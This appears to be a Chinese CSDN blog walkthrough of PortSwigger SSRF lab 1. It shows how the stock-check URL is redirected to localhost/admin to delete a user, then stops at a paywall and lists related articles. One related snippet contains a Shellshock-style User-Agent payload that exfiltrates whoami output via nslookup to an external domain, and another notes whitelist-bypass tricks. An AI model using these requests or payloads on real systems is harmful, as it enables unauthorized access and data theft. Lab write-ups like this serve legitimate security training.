【BurpSuite】SSRF | Server-side request forgery (1-5)

已于 2024-09-27 14:55:07 修改
阅读量1.1k 收藏 19
点赞数 48
分类专栏: # 靶场 文章标签: web安全 网络安全
于 2024-09-10 09:37:42 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_71944965/article/details/141958338
版权

🏘️个人主页: 点燃银河尽头的篝火(●’◡’●)
如果文章有帮到你的话记得点赞👍+收藏💗支持一下哦

【BurpSuite】SSRF | Server-side request forgery (1-5)

实验一 Lab: Basic SSRF against the local server

要求:
本实验室具有从内部系统获取数据的库存检查功能。
要解决这个问题,请将库存检查URL更改为访问管理界面http://localhost/admin删除用户carlos

进入靶场My account发现是一个登录页面
用admin试试发现登录失败
在这里插入图片描述

按靶场提示去检查商品库存并抓包找到url在这里插入图片描述

将URL更改为访问管理界面http://localhost/admin
在这里插入图片描述

更改url后将抓包发送到Repeater
在这里插入图片描述

在Response中找到delete部分
在这里插入图片描述

将delete语句放到url中再放行
在这里插入图片描述

回到靶场,下图右上角变为Solved即为成功
在这里插入图片描述

实验二 Lab: Basic SSRF against another back-end system

要求:

最低0.47元/天 解锁文章
Portwigge的Web安全漏洞训练平台SSRF通关
st3pby的博客
11-16 1999
Portwigge的Web安全漏洞训练平台SSRF通关
pikachu SSRF (Server-Side Request Forgery 服务器端请求伪造)(皮卡丘漏洞平台通关系列)
箭雨镜屋
04-10 2922
一、官方介绍 本节引用内容来自pikachu漏洞平台 SSRF(Server-Side Request Forgery:服务器端请求伪造) 其形成的原因大都是由于服务端提供了从其他服务器应用获取数据的功能,但又没有对目标地址做严格过滤与限制 导致攻击者可以传入任意的地址来让后端服务器对其发起请求,并返回对该目标地址请求的数据 数据流:攻击者----->服务器---->目标地址 根据后台使用的函数的不同,对应的影响和利用方法又有不一样 PHP中下面函数的使用不当会导致SSRF: file
PortSwigger Academy | Server-side request forgery (SSRF) : 服务器端请求伪造
水榭山寺花烂漫,凤凰集外雁归来。敢与云峰争秀色,妙雨莲花九重开。
01-27 1469
文章目录总结什么是SSRFSSRF攻击有什么影响?常见的SSRF攻击针对服务器本身的SSRF攻击Lab: Basic SSRF against the local serverSSRF攻击其他后端系统Lab: Basic SSRF against another back-end system规避SSRF的常见防御措施具有基于黑名单的输入过滤器的SSRFLab: SSRF with blacklist-based input filter具有基于白名单的输入过滤器的SSRFLab: SSRF with w
SSRF-bp靶场
qq_53510194的博客
03-26 486
User-agent()输入 { :;/usr/bin/nslookup $(whoami).bp域名 执行命令。1.要求域名必须是stock.weliketoshop.net(常规的请求地址)在另一翻页处(next product),发现类似的path参数,内容为路径。猜测两处公用一个api(stockApi),构造新的stockApi进行测试。@绕过白名单,解码出来的#锁定127.0.0.1。url中的#:<域名>#<位置标识符>url中的@:<用户名>@<域名>找到删除用户的url,改包放包。
SSRF attacks against other back-end systems SSRF攻击其他后端系统
jamesP777的博客
05-11 354
有时候,应用服务器可以和用户连接不到的其他后端系统直接连接。这些后端系统通常是使用的私有IP地址。由于这些后端系统被网络拓扑结构保护起来了,所以安全性不高。多数的内部后端系统允许能够连接到他们的用户不经授权直接接入从而执行一些敏感操作。在上一个实验中,如果有个管理员接口在后端地址:https://192.168.0.68/admin,攻击者同样可以修改stocApi进行SSRF漏洞攻击。
网络安全SSRF+XXE漏洞挖掘笔记
kali_Ma的博客
10-23 1735
声明 本文仅供学习参考,其中涉及的一切资源均来源于网络,请勿用于任何非法行为,否则您将自行承担相应后果 一、Server-side request forgery (SSRF) 01、Basic SSRF against the local server 描述 该实验室具有库存检查功能,可从内部系统获取数据。 为了解决实验室,更改股票检查 URL 以访问管理界面http://localhost/admin并删除用户carlos。 解决方案 1.浏览/admin并观察您无法直接访问管理页面。 2.访问一个产
SSRF(通过时间判断) 点击保存头像,开启burpsuite抓包
10-07
SSRFServer-Side Request Forgery,服务器端请求伪造)是一种常见的网络安全漏洞,它允许攻击者利用服务器的网络权限发起对外部资源的请求。在这个场景中,通过时间延迟的判断方法,攻击者能够探测内网中的某些...
burpsuitessrf
09-13
其中一个常见的漏洞是SSRFServer-Side Request Forgery)漏洞,它允许攻击者发送恶意请求,使应用程序内部可以访问的资源。 SSRF-King是专为Burp Suite开发的一个插件,它可以自动化SSRF检测。通过使用SSRF-King...
红队专题-漏洞挖掘-代码审计-CSRF/SSRF/Xss
aming小老弟
03-11 1057
其中 Web A 为存在 CSRF 漏洞的网站,Web B 为攻击者构建的恶意网站,User C 为 Web A 网站的合法用户。用户 C 打开浏览器,访问受信任网站 A,输入用户名和密码请求登录网站A在用户信息通过验证后,网站 A 产生 Cookie 信息并返回给浏览器,此时用户登录网站 A 成功,可以正常发送请求到网站A用户未退出网站 A 之前,在同一浏览器中,打开一个 TAB 页访问网站 B网站 B 接收到用户请求后,返回一些攻击性代码,并发出一个请求要求访问第三方站点 A。
PortsWigger-SSRF
m0_74606212的博客
03-02 1024
PortsWigger-SSRF合集
SSRF():PortSwigger靶场笔记
aaaadoga的博客
07-14 1027
该文章是关于作者在PortSwigger的SSRF靶场训练的记录和学习笔记
【Burpsuit靶场记录】(后续题目更新到主页不同的漏洞专题)
asmartrman的博客
02-19 717
Burpsuit靶场记录(手续题目更新到主页不同的漏洞专题)
ssrf-lab踩坑记录
qq_39670065的博客
09-03 652
详细安装见Centos7下安装Docker(详细安装教程) 可以配置镜像加速器,在阿里云找docker节点 解决办法Linux -bash: git: 未找到命令的解决方法
Lab: Blind XXE with out-of-band interaction | Lab: Blind XXE with out-of-band interaction via XML pa...
Zeker62的博客
08-26 393
什么是盲XXE? 当应用程序容易受到XXE 注入但不返回其响应中任何定义的外部实体的值时,就会出现盲 XXE 漏洞。这意味着直接检索服务器端文件是不可能的,因此盲 XXE 通常比常规 XXE 漏洞更难被利用。 有两种广泛的方法可以找到和利用盲 XXE 漏洞: 您可以触发带外网络交互,有时会在交互数据中泄露敏感数据。 您可以通过错误消息包含敏感数据的方式触发 XML 解析错误。 使用带外 ( OA...
深入浅出入侵检测系统(IDS)的工作原理与应用场景
JakeMa1024的博客
05-14 784
入侵检测系统(IDS)是网络安全领域的关键工具,被誉为“火眼金睛”,能够实时监测网络流量和系统行为,识别潜在的入侵企图和异常活动。IDS通过数据收集、分析、威胁评估和响应处理四个步骤,利用特征匹配和异常检测技术,发现并报告可疑行为。与防火墙不同,IDS不直接拦截攻击,而是通过警报和日志记录帮助管理员及时应对威胁。IDS的优势在于实时监测、低误报率和安全审计,但也存在无法主动防御、依赖人工响应和对未知攻击识别有限的缺点。未来,随着人工智能和机器学习的发展,IDS的检测能力将进一步提升,与防火墙等其他安全技术协
WEB安全--Java安全--CC1利用链
最新发布
m0_74800552的博客
05-14 835
CC1利用链的原理与构建方式
Web安全核心内容与常见漏洞总结
weixin_47389477的博客
05-14 167
启用 ‌Content Security Policy(CSP)‌ 限制脚本加载源,阻断 XSS 攻击链。使用参数化查询(Prepared Statements)防御 SQL 注入。对用户输入进行严格校验(如正则表达式匹配),过滤特殊字符(如。输出数据时进行 HTML 实体编码,避免 XSS 攻击。实现细粒度权限管理(如 RBAC 模型),避免越权操作。部署 ‌Web 应用防火墙(WAF)‌ 过滤恶意流量。使用 SSL/TLS 加密数据传输,防止中间人攻击6。强制使用多因素认证(MFA)提升账户安全性。
2025 AI如何重构网络安全产品
关注博文底部公众号,发送标题关键字获取文档。
05-14 672
深度解析网闸策略:构建坚固的网络安全防线
m0_67544876的博客
05-14 743
在数字化浪潮中,网络安全已成为企业、机构乃至国家稳定发展的关键要素。随着网络攻击手段日益复杂多样,传统的网络安全防护措施难以满足日益增长的安全需求。网闸作为一种先进的网络安全设备,以其独特的隔离与数据交换机制,在保障网络安全方面发挥着不可替代的重要作用。本文将深入探讨网闸策略,全面解析其原理、类型、配置要点以及在不同场景下的应用,助力读者构建坚如磐石的网络安全防线。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值